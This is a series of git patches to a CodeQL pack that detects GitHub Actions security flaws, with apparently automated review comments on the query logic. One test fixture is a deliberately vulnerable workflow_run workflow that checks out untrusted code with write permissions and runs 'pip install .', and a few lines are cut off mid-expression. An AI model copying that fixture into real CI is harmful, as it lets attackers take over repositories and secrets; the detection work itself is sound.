From 3ce3cf43bede831cf888cc9d7dec5cc38e8fb2cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:35 +0100 Subject: [PATCH 675/707] refactor common code to identify untrusted checkouts --- .../codeql/actions/dataflow/FlowSources.qll | 47 +------------------ .../security/ArtifactPoisoningQuery.qll | 15 +++--- .../security/OutputClobberingQuery.qll | 21 +-------- .../security/UntrustedCheckoutQuery.qll | 25 ++++++++++ 4 files changed, 37 insertions(+), 71 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2fca425642e7..cf1763b1c03c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -92,28 +92,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - ( - exists(Uses uses | - checkout = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - checkout instanceof GitMutableRefCheckout - or - checkout instanceof GitSHACheckout - or - checkout instanceof GhMutableRefCheckout - or - checkout instanceof GhSHACheckout - ) and + checkout instanceof SimplePRHeadCheckoutStep and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and 
@@ -255,29 +234,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { private class CheckoutSource extends RemoteFlowSource, FileSource { Event event; - CheckoutSource() { - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - this.asExpr() = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - event = uses.getATriggerEvent() and - event.getName() = checkoutTriggers() - ) - or - this.asExpr() instanceof GitMutableRefCheckout - or - this.asExpr() instanceof GitSHACheckout - or - this.asExpr() instanceof GhMutableRefCheckout - or - this.asExpr() instanceof GhSHACheckout - } + CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31427287b0c8..d8d5f83c867d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UntrustedCheckoutQuery string unzipRegexp() { result = "(unzip|tar)\\s+.*" } 
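Review bot: After this change nothing in the characteristic predicate of `CheckoutSource` constrains the `Event event` field, which the removed `actions/checkout` disjunct used to bind with `event = uses.getATriggerEvent()`; any member predicate that reads `event` (the class body continues past the hunk, so I cannot see whether one does) will now range over every `Event` in the database instead of the checkout's own trigger events. The old `Git*`/`Gh*` disjuncts left the field unbound as well, so the problem predates this commit, but the refactor makes it apply to every instance. Either delete the field if nothing uses it, or bind it in the charpred: `CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep and event = this.asExpr().(SimplePRHeadCheckoutStep).getATriggerEvent() }`.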
@@ -22,11 +23,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(LocalJob job, UsesStep checkout, UsesStep upload | + exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload | this.getEnclosingWorkflow().getAJob() = job and job.getAStep() = checkout and - job.getATriggerEvent().getName() = "pull_request_target" and - checkout.getCallee() = "actions/checkout" and + checkout.getATriggerEvent().getName() = "pull_request_target" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" ) @@ -55,8 +55,10 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep "ma-ve/action-download-artifact-with-retry" ] and ( - not exists(this.getArgument(["branch", "branch_name"])) or - not this.getArgument(["branch", "branch_name"]) = ["main", "master"] + not exists(this.getArgument(["branch", "branch_name"])) + or + exists(this.getArgument(["branch", "branch_name"])) and + this.getArgument("allow_forks") = "true" ) and ( not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or @@ -74,7 +76,8 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument("pr")) or - not this.getArgument("pr").matches("%github.event.pull_request.number%") + not this.getArgument("pr") + .matches(["%github.event.pull_request.number%", "%github.event.number%"]) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e6cc0d06a466..1d0de83afa34 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
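Review bot: The rewritten `branch`/`branch_name` condition in `DownloadArtifactActionStep` now treats a branch-filtered download as untrusted only when the workflow spells out `allow_forks: true`; if the action's own default for `allow_forks` is true (I believe it is for `dawidd6/action-download-artifact`, but verify against its `action.yml`), the common case of a `branch:` filter with no `allow_forks` key at all is equally reachable from a fork and is now silently dropped from the source set, where previously it was reported unless the branch was `main`/`master`. Flagging everything that is not explicitly opted out is the safer shape: `exists(this.getArgument(["branch", "branch_name"])) and not this.getArgument("allow_forks") = "false"`. Dropping the old `main`/`master` exemption is the right direction regardless, since a fork can name its branch `main` and a branch name is not a trust boundary.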
@@ -20,26 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This should be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - step = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - step instanceof GitMutableRefCheckout - or - step instanceof GitSHACheckout - or - step instanceof GhMutableRefCheckout - or - step instanceof GhSHACheckout + step instanceof SimplePRHeadCheckoutStep ) and step.getAFollowingStep() = run and this.asExpr() = run.getScript() and diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 9653ae2beda1..1a75f8a96c16 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -193,6 +193,31 @@ predicate containsHeadRef(string s) { ) } +class SimplePRHeadCheckoutStep extends Step { + SimplePRHeadCheckoutStep() { + // This should be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses uses | + this = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") and + uses.getATriggerEvent().getName() = checkoutTriggers() + ) + or + this instanceof GitMutableRefCheckout + or + this instanceof GitSHACheckout + or + this instanceof GhMutableRefCheckout + or + this instanceof GhSHACheckout + } +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); From afb7967a0cde8e0018678cc2c5453515828f36d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:59 +0100 Subject: [PATCH 676/707] Delete .actual test files --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.actual | 1 - 1 file changed, 1 deletion(-) delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af1..000000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From 082b4c3ca2c28032e28361dd9eda4351cafed333 Mon Sep 17 00:00:00 2001 
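Review bot: `SimplePRHeadCheckoutStep` is a public class with no QLDoc comment, and the comment it carries was copied from `OutputClobberingQuery.qll`, so it still says `artifact instanceof PRHeadCheckoutStep` (here it should read `this instanceof PRHeadCheckoutStep`) and keeps the typos `anc` and `Monolitic` (the QL error is "non-monotonic recursion"). I would add a doc comment along the lines of `/** A checkout step likely to fetch a Pull Request HEAD, computed syntactically (no taint tracking) so it can be used where PRHeadCheckoutStep would cause non-monotonic recursion. Over-approximates: any actions/checkout with a ref not mentioning "base", on a checkout-triggering event, counts. */`. Note also that the `getATriggerEvent().getName() = checkoutTriggers()` restriction applies only to the `actions/checkout` disjunct; the `Git*`/`Gh*` checkout classes are accepted on any event here, so callers needing the restriction must add it themselves, as `ArtifactPoisoningQuery.qll` does with `pull_request_target` — worth stating in the doc comment unless those classes already filter by event (their definitions are outside this hunk).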
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:35:49 +0100 Subject: [PATCH 677/707] Add poisonable step for pip install . --- ql/lib/ext/config/poisonable_steps.yml | 6 +-- .../CWE-094/.github/workflows/test27.yml | 52 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 12 +++++ .../CWE-094/CodeInjectionMedium.expected | 11 ++++ .../CWE-829/.github/workflows/test7.yml | 1 + .../UntrustedCheckoutCritical.expected | 6 ++- 6 files changed, 83 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b4027..87ed8eec76f1 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -41,9 +41,9 @@ extensions: - ["pre-commit"] - ["prettier"] - ["phpstan"] - - ["pip\\s+install\\s+-r"] - - ["pip\\s+install\\s+--requirement"] - - ["pipx\\s+install\\s+\\."] + - ["pip\\s+install(.*)\\s+-r"] + - ["pip\\s+install(.*)\\s+--requirement"] + - ["pip(x)?\\s+install(.*)\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml new file mode 100644 index 000000000000..e9ba77c0f939 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
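Review bot: The new `(.*)` in `pip\\s+install(.*)\\s+-r` and `pip(x)?\\s+install(.*)\\s+\\.` is greedy and unanchored, so on a `&&`/`;`-joined script line it spans into later commands: `pip install foo && rm -r build` now matches the `-r` pattern and `pip install foo && cd .` matches the `\\.` pattern, which inflates poisonable-step hits (how these regexes are applied to a statement is defined outside this file, so the practical effect depends on that). Limiting the option run to a single command, `pip\\s+install([^&|;]*)\\s+-r` and `pip(x)?\\s+install([^&|;]*)\\s+\\.`, still covers the intended `--no-deps .` and `-e .` cases while stopping at the separator. The capturing parentheses in `(.*)` and `(x)?` do not appear to be used for anything; plain `.*` and `x?` read clearer.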
@@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e60664795762..e13c2b80a72f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -206,6 +206,11 @@ edges | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT shell: bash - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b433ec02f17..111edb7646df 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -210,7 +210,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | -| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:60:6 | Run Step | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
@@ -351,7 +352,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step 
| Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 9a137db12bbd01402c897653f32e896f767f2f29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:36:20 +0100 Subject: [PATCH 678/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b72f94d1bb15..d938d0617e9a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.0 +version: 0.2.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a9f045567b0b..99ac2c740119 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.0 +version: 0.2.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1fa00f106532e3db0457368d78a9f187ac9d61ee Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 14:31:10 +0100 Subject: [PATCH 679/707] Capture the event name rathen than the whole event --- .../codeql/actions/dataflow/FlowSources.qll | 52 ++++++++++--------- .../Security/CWE-094/CodeInjectionCritical.ql | 2 +- 2 files changed, 28 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index cf1763b1c03c..9259f18f108c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,22 +19,26 @@ abstract class RemoteFlowSource extends SourceNode { abstract string getSourceType(); /** Gets the event that triggered the source. */ - abstract Event getEvent(); + abstract string getEventName(); override string getThreatModel() { result = "remote" } } +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ class GitHubCtxSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(event.getName(), context_prefix) and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) 
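Review bot: The QLDoc above the renamed abstract member still reads "Gets the event that triggered the source." although the predicate now returns a string, so it should become `/** Gets the name of the event that triggered the source. */` on the line before `abstract string getEventName();`. In the same hunk `GitHubCtxSource` binds `event` through `e.getEnclosingWorkflow().getATriggerEvent().getName()` while the other sources in this patch use `this.asExpr().getATriggerEvent()` or `getEnclosingRun().getATriggerEvent()`; if those resolve differently for expressions outside a workflow (composite actions, reusable workflows) the sources will disagree on when an event name exists, which is worth a comment or a single helper. Eight classes later in the patch override the member with the identical body `result = this.asExpr().getATriggerEvent().getName()`; making that the non-abstract default in `RemoteFlowSource` and overriding only the exceptions would remove the repetition.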
@@ -42,23 +46,23 @@ class GitHubCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; - Event event; + string event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent() and + event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or @@ -74,7 +78,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { string getContext() { result = context } - override Event getEvent() { result = event } + override string getEventName() { result = event } } abstract class CommandSource extends RemoteFlowSource { @@ -82,7 +86,7 @@ abstract class CommandSource extends RemoteFlowSource { abstract Run getEnclosingRun(); - override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } } class GitCommandSource extends RemoteFlowSource, CommandSource { 
@@ -172,19 +176,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -199,7 +203,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } /** @@ -212,7 +216,7 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } abstract class FileSource extends RemoteFlowSource { } 
@@ -225,20 +229,18 @@ class ArtifactSource extends RemoteFlowSource, FileSource { override string getSourceType() { result = "artifact" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { - Event event; - CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } - override Event getEvent() { result = event } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -255,7 +257,7 @@ class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -278,7 +280,7 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -301,7 +303,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { 
@@ -315,7 +317,7 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { @@ -329,7 +331,7 @@ class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -352,5 +354,5 @@ class OctokitRequestActionSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index b52c07023443..c4ab00837ca7 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -23,7 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, 